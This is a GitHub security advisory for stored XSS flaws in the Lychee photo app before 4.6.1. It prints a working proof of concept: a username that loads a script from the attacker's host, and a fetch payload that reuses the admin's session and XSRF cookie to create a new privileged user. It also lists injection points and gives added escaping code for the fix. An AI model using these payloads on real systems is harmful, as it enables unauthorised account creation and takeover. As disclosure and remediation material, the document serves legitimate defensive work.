This repository has been archived by the owner on Dec 25, 2023. It is now read-only.

XSS on the front-end

Moderate
ildyria published GHSA-cr79-38hg-27gv Oct 10, 2022

Package

composer lychee-org/lychee (Composer)

Affected versions

< 4.6.1

Patched versions

4.6.1

Description

Several XSS vulnerabilities were found in Lychee 4.6.0. They could allow an unauthenticated attacker to obtain authenticated access to the platform by getting a new account created through the administrator's browser.
Although the front-end is written in JavaScript, Lychee's versioning is tied to Composer.

Details

Several XSS vulnerabilities were found in Lychee 4.6.0. They could allow an unauthenticated attacker to obtain authenticated access to the platform by creating a new account.
One of them was exploitable before authentication; the rest required an authenticated user account.

Using the unauthenticated XSS it was possible to create a new user by attempting to log in as the non-existent user <script src="172.0.0.1/a.js"/>, with the file a.js containing the following:

fetch('http://172.17.0.2:80/api/User::create', {
    // POST request sent to the Lychee instance located at `172.17.0.2`; the script executes
    // in the Lychee origin, so fetch's default credentials mode attaches the admin's session cookie
    method: 'POST',
    // set up the headers the Lychee front-end normally sends
    headers: {
        'Content-Type': 'application/json',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        // the X-XSRF-TOKEN is retrieved from the cookie store, as that cookie is not `HttpOnly`
        'X-XSRF-TOKEN': document.cookie.split('=')[1].split('%')[0],
        'X-Requested-With': 'XMLHttpRequest',
    },
    // body of the request containing the payload to create a new user with upload privileges
    body: '{"username":"xss_1","password":"xss","may_upload":true,"is_locked":false}'
});

Once the admin user views the "Show logs" page, their browser requests the a.js script from the attacker's machine and executes it, which sends the HTTP request to create a new user. Because the request originates from the Lychee origin, the admin's browser automatically includes the session cookie and the new user is created.

Affected location

The injection points were:

  • Username (unauthenticated): An attacker without an account could try to authenticate as as<script>alert(3)</script>df. The payload is triggered when the admin user opens the application logs (/api/Logs::list). This could also be used for log injection.
  • Username (authenticated): A user can change their username to contain JS code (/api/Settings::updateLogin). The payload is triggered:
    • when the admin user opens the application logs (/api/Logs::list)
    • when a user wants to share an album with other users (/api/Sharing::list)
    • (if the user has a non-empty album) when the admin user opens the landing page, since the admin sees all albums and the owner's username is supplied with each one
  • PhotoTitle: A user with sufficient permission can upload a photo whose title contains JS code. The payload is triggered in the delete confirmation message (/api/Photo::get).
  • AlbumTitle: A user with sufficient permission can create an album whose title contains JS code. The payload is triggered in the delete confirmation message (/api/Album::get).
  • PhotoDescription: A user with sufficient permission can change a photo description to insert JS code. The payload is triggered when a user displays the photo (/api/Photo::get).

The code reflection points are listed below:

Patches

The project chose to fix the vulnerabilities by sanitizing the output (escaping at render time) rather than transforming the user input on the way in.
#324 #325 fix the issues.
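The following is an added example (not Lychee's code, and not taken from #324 or #325) of the escape-on-output approach described above, applied to a log entry renderer. The log message template, the entry shape and the helper names are assumptions; the two username payloads are the ones quoted in this advisory. It contrasts the vulnerable pattern (user-controlled text concatenated into markup) with the hardened one (every dynamic value escaped before it reaches the HTML string) and includes a small check that flags any tag the template did not put there.

```javascript
// Added example: output escaping for user-controlled strings (username, photo/album
// title, description) at the point where they are put into HTML. Not Lychee's code.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that can break out of text or attribute context in HTML.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the username from the log entry is concatenated into markup verbatim.
// (The message wording is an assumed template, not Lychee's actual log format.)
function renderLogEntryVulnerable(entry) {
  return `<div class="log"><span class="type">${entry.type}</span> ` +
         `User (${entry.username}) has tried to log in</div>`;
}

// Hardened pattern: same template, but every dynamic value is escaped first.
function renderLogEntrySafe(entry) {
  return `<div class="log"><span class="type">${escapeHtml(entry.type)}</span> ` +
         `User (${escapeHtml(entry.username)}) has tried to log in</div>`;
}

// Check: the rendered markup must contain no tag other than the template's own div/span.
// Any other tag name means user input was interpreted as HTML.
function containsForeignTag(html, allowed = ['div', 'span']) {
  const tagRe = /<\/?([a-zA-Z][\w-]*)/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    if (!allowed.includes(m[1].toLowerCase())) return true;
  }
  return false;
}

// Constructed log entries (assumed shape) using the payloads quoted in this advisory
// plus a benign control value.
const SAMPLE_ENTRIES = [
  { type: 'error', username: 'as<script>alert(3)</script>df' },
  { type: 'error', username: '<script src="172.0.0.1/a.js"/>' },
  { type: 'notice', username: 'alice' },
];

// Render every sample with both renderers and report whether a foreign tag survived.
function auditRenderers() {
  return SAMPLE_ENTRIES.map((entry) => ({
    username: entry.username,
    vulnerableInjects: containsForeignTag(renderLogEntryVulnerable(entry)),
    safeInjects: containsForeignTag(renderLogEntrySafe(entry)),
  }));
}

for (const r of auditRenderers()) {
  console.log(`${JSON.stringify(r.username)} -> vulnerable: ${r.vulnerableInjects}, safe: ${r.safeInjects}`);
}
```

The same escaping has to be applied at every sink listed under "Affected location" (logs, sharing list, landing page, delete confirmations, photo view); escaping in one renderer leaves the others exploitable. Where the front-end builds DOM nodes directly, setting textContent instead of innerHTML achieves the same result without a helper.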

Workarounds

None.

References

https://owasp.org/www-community/attacks/xss/

Severity

Moderate

CVSS overall score

6.3 / 10

CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: Required
Scope: Unchanged
Confidentiality: Low
Integrity: Low
Availability: Low

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

CVE ID

No known CVE

Credits